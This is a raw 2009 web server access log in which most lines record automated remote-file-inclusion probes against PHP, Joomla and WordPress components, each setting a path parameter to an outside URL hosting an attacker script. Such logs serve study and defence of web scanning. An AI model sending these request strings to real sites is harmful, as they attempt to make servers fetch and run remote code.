121.125.74.87 - - [21/Sep/2009:13:24:17 -0700] "GET /logs/access.log%20%20/modules/My_eGallery/public/mainGallery.php?basepath=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:13:24:38 -0700] "GET /logs/modules/My_eGallery/public/nmimage.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:13:24:38 -0700] "GET /modules/My_eGallery/public/nmimage.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:13:24:38 -0700] "GET /logs/access.log/modules/My_eGallery/public/nmimage.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:13:24:38 -0700] "GET /logs/access.log/modules/My_eGallery/public/nmimage.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:13:24:38 -0700] "GET /logs/modules/My_eGallery/public/nmimage.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:13:24:38 -0700] "GET /modules/My_eGallery/public/nmimage.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
81.169.138.128 - - [21/Sep/2009:13:24:58 -0700] "GET /modules/cjaycontent/admin/editor2/errors.php?error=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
81.169.138.128 - - [21/Sep/2009:13:24:59 -0700] "GET /logs/access.log//modules/cjaycontent/admin/editor2/errors.php?error=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
81.169.138.128 - - [21/Sep/2009:13:24:59 -0700] "GET /logs//modules/cjaycontent/admin/editor2/errors.php?error=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
199.120.90.223 - - [21/Sep/2009:13:25:08 -0700] "GET /logs/access.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:13:25:23 -0700] "GET /logs/access.log%20%20/modules/My_eGallery/public/nmimage.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:13:25:25 -0700] "GET /logs/access.log%20%20/modules/My_eGallery/public/nmimage.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:13:25:37 -0700] "GET /logs/access_090420.log%20%20/modules/My_eGallery/public/nmimage.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.225.196.53 - - [21/Sep/2009:13:25:37 -0700] "GET /modules/My_eGallery/public/nmimage.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.225.196.53 - - [21/Sep/2009:13:25:37 -0700] "GET /logs/modules/My_eGallery/public/nmimage.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.225.196.53 - - [21/Sep/2009:13:25:38 -0700] "GET /modules/My_eGallery/public/nmimage.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.225.196.53 - - [21/Sep/2009:13:25:38 -0700] "GET /logs/access_090420.log%20%20/modules/My_eGallery/public/nmimage.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.225.196.53 - - [21/Sep/2009:13:25:38 -0700] "GET /logs/modules/My_eGallery/public/nmimage.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.169.138.128 - - [21/Sep/2009:13:25:57 -0700] "GET /modules/cjaycontent/admin/editor2/errors.php?error=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.169.138.128 - - [21/Sep/2009:13:25:57 -0700] "GET /logs//modules/cjaycontent/admin/editor2/errors.php?error=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.169.138.128 - - [21/Sep/2009:13:25:57 -0700] "GET /logs/access_090420.log//modules/cjaycontent/admin/editor2/errors.php?error=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.191.168.119 - - [21/Sep/2009:13:25:59 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.191.168.119 - - [21/Sep/2009:13:25:59 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.191.168.119 - - [21/Sep/2009:13:25:59 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
63.253.165.100 - - [21/Sep/2009:13:26:27 -0700] "GET /index.php3?s=http://www.medisite.fr/id??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
121.125.74.87 - - [21/Sep/2009:13:26:35 -0700] "GET /modules/My_eGallery/public/mainGallery.php?basepath=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [21/Sep/2009:13:26:35 -0700] "GET /logs/access_090420.log%20%20/modules/My_eGallery/public/mainGallery.php?basepath=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [21/Sep/2009:13:26:35 -0700] "GET /logs/modules/My_eGallery/public/mainGallery.php?basepath=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.225.196.53 - - [21/Sep/2009:13:26:55 -0700] "GET /logs/modules/My_eGallery/public/nmimage.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.225.196.53 - - [21/Sep/2009:13:26:55 -0700] "GET /modules/My_eGallery/public/nmimage.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.225.196.53 - - [21/Sep/2009:13:26:59 -0700] "GET /logs/access_090420.log%20%20/modules/My_eGallery/public/nmimage.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.225.196.53 - - [21/Sep/2009:13:27:05 -0700] "GET /logs/modules/My_eGallery/public/nmimage.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.225.196.53 - - [21/Sep/2009:13:27:05 -0700] "GET /modules/My_eGallery/public/nmimage.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.225.196.53 - - [21/Sep/2009:13:27:09 -0700] "GET /logs/access_090420.log%20%20/modules/My_eGallery/public/nmimage.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
83.55.139.182 - - [21/Sep/2009:13:27:36 -0700] "GET /atom.php5?page=http://www.medisite.fr/id??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
83.55.139.182 - - [21/Sep/2009:13:27:36 -0700] "GET /logs//atom.php5?page=http://www.medisite.fr/id??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
80.131.212.139 - - [21/Sep/2009:13:27:52 -0700] "GET /labia/ HTTP/1.1" 200 524 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.galf.org"
80.131.212.139 - - [21/Sep/2009:13:27:54 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.galf.org"
199.120.90.223 - - [21/Sep/2009:13:28:00 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
199.120.90.223 - - [21/Sep/2009:13:28:00 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
199.120.90.223 - - [21/Sep/2009:13:28:00 -0700] "GET /logs/access_090406.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.100.5.136 - - [21/Sep/2009:13:29:36 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.100.5.136 - - [21/Sep/2009:13:29:36 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.100.5.136 - - [21/Sep/2009:13:29:36 -0700] "GET /logs/access.log%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.6.107.34 - - [21/Sep/2009:13:30:19 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.freewebtown.com/ppkkssss/arroz/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
64.6.107.34 - - [21/Sep/2009:13:30:19 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.freewebtown.com/ppkkssss/arroz/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
64.6.107.34 - - [21/Sep/2009:13:30:20 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.freewebtown.com/ppkkssss/arroz/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.191.168.119 - - [21/Sep/2009:13:30:41 -0700] "GET /logs/access.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.203.180.144 - - [21/Sep/2009:13:32:03 -0700] "GET /logs/access.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.191.168.119 - - [21/Sep/2009:13:32:59 -0700] "GET /logs/access_090406.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.191.168.119 - - [21/Sep/2009:13:32:59 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.191.168.119 - - [21/Sep/2009:13:32:59 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.72.216 - - [21/Sep/2009:13:33:48 -0700] "GET /logs/access_090316.log//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.q-fashion.com/imgnew/fxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.72.216 - - [21/Sep/2009:13:33:48 -0700] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.q-fashion.com/imgnew/fxid1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
222.122.72.216 - - [21/Sep/2009:13:33:48 -0700] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.q-fashion.com/imgnew/fxid1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
81.169.138.128 - - [21/Sep/2009:13:35:46 -0700] "GET /logs/access.log%20%20//modules/cjaycontent/admin/editor2/errors.php?error=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.191.168.119 - - [21/Sep/2009:13:35:52 -0700] "GET /logs/access_090608.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.203.180.144 - - [21/Sep/2009:13:36:34 -0700] "GET /logs/access_090406.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.169.138.128 - - [21/Sep/2009:13:37:10 -0700] "GET /logs/access_090420.log%20%20//modules/cjaycontent/admin/editor2/errors.php?error=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
79.174.78.83 - - [21/Sep/2009:13:37:45 -0700] "GET /logs/access_090316.log//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
79.174.78.83 - - [21/Sep/2009:13:37:45 -0700] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/gid.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
222.122.46.83 - - [21/Sep/2009:13:38:30 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.46.83 - - [21/Sep/2009:13:38:30 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.46.83 - - [21/Sep/2009:13:38:30 -0700] "GET /logs/access_090420.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
79.174.78.83 - - [21/Sep/2009:13:39:02 -0700] "GET /logs/access_090316.log//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
79.174.78.83 - - [21/Sep/2009:13:39:02 -0700] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/gid.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
79.174.78.83 - - [21/Sep/2009:13:39:02 -0700] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/gid.txt??? HTTP/1.1" 200 4804 "-" "libwww-perl/5.805" "www.galf.org"
123.213.63.137 - - [21/Sep/2009:13:39:55 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
123.213.63.137 - - [21/Sep/2009:13:39:55 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
123.213.63.137 - - [21/Sep/2009:13:39:55 -0700] "GET /logs/access_090420.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.46.83 - - [21/Sep/2009:13:39:55 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.122.46.83 - - [21/Sep/2009:13:39:55 -0700] "GET /logs/access.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.122.46.83 - - [21/Sep/2009:13:39:55 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
123.213.63.137 - - [21/Sep/2009:13:40:01 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
123.213.63.137 - - [21/Sep/2009:13:40:01 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
123.213.63.137 - - [21/Sep/2009:13:40:01 -0700] "GET /logs/access_090420.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
199.120.90.223 - - [21/Sep/2009:13:40:03 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
118.168.13.16 - - [21/Sep/2009:13:40:13 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.medisite.fr/id??? HTTP/1.0" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.galf.org"
199.120.90.223 - - [21/Sep/2009:13:40:27 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
79.174.78.83 - - [21/Sep/2009:13:40:47 -0700] "GET /logs/access_090316.log//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
79.174.78.83 - - [21/Sep/2009:13:40:47 -0700] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/gid.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
79.174.78.83 - - [21/Sep/2009:13:40:48 -0700] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/gid.txt??? HTTP/1.1" 200 4804 "-" "libwww-perl/5.805" "www.galf.org"
211.203.180.144 - - [21/Sep/2009:13:40:56 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.203.180.144 - - [21/Sep/2009:13:40:56 -0700] "GET /logs/access.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.203.180.144 - - [21/Sep/2009:13:40:56 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
123.213.63.137 - - [21/Sep/2009:13:40:56 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
123.213.63.137 - - [21/Sep/2009:13:40:56 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
123.213.63.137 - - [21/Sep/2009:13:41:08 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
123.213.63.137 - - [21/Sep/2009:13:41:08 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
123.213.63.137 - - [21/Sep/2009:13:41:08 -0700] "GET /logs/access.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
94.23.2.21 - - [21/Sep/2009:13:41:16 -0700] "GET /playing.php/common/db.php?commonpath=http://ddlfilez.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
211.203.180.144 - - [21/Sep/2009:13:41:44 -0700] "GET /logs/access.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.203.180.144 - - [21/Sep/2009:13:41:44 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.203.180.144 - - [21/Sep/2009:13:41:44 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
74.6.8.115 - - [21/Sep/2009:13:43:46 -0700] "GET /cendoc/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
79.174.78.83 - - [21/Sep/2009:13:43:52 -0700] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/gid.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
79.174.78.83 - - [21/Sep/2009:13:43:52 -0700] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/gid.txt??? HTTP/1.1" 200 4804 "-" "libwww-perl/5.805" "www.galf.org"
79.174.78.83 - - [21/Sep/2009:13:43:52 -0700] "GET /logs/access_090316.log//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.6.107.34 - - [21/Sep/2009:13:44:01 -0700] "GET /logs/access_090608.log%20%20/playing.php/common/db.php?commonpath=http://www.freewebtown.com/ppkkssss/arroz/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.6.107.34 - - [21/Sep/2009:13:44:01 -0700] "GET /playing.php/common/db.php?commonpath=http://www.freewebtown.com/ppkkssss/arroz/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.6.107.34 - - [21/Sep/2009:13:44:01 -0700] "GET /logs/playing.php/common/db.php?commonpath=http://www.freewebtown.com/ppkkssss/arroz/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
199.120.90.223 - - [21/Sep/2009:13:44:11 -0700] "GET /logs/access.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.122.72.216 - - [21/Sep/2009:13:44:12 -0700] "GET /logs/access_090720.log%20%20//wp-content/plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://jdzin2.vfose.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.72.216 - - [21/Sep/2009:13:44:12 -0700] "GET /logs//wp-content/plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://jdzin2.vfose.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.72.216 - - [21/Sep/2009:13:44:12 -0700] "GET /wp-content/plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://jdzin2.vfose.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.6.107.34 - - [21/Sep/2009:13:44:23 -0700] "GET /logs/access_090615.log%20%20/playing.php/common/db.php?commonpath=http://www.freewebtown.com/ppkkssss/arroz/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.72.216 - - [21/Sep/2009:13:44:46 -0700] "GET /wp-content/plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://jdzin2.vfose.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
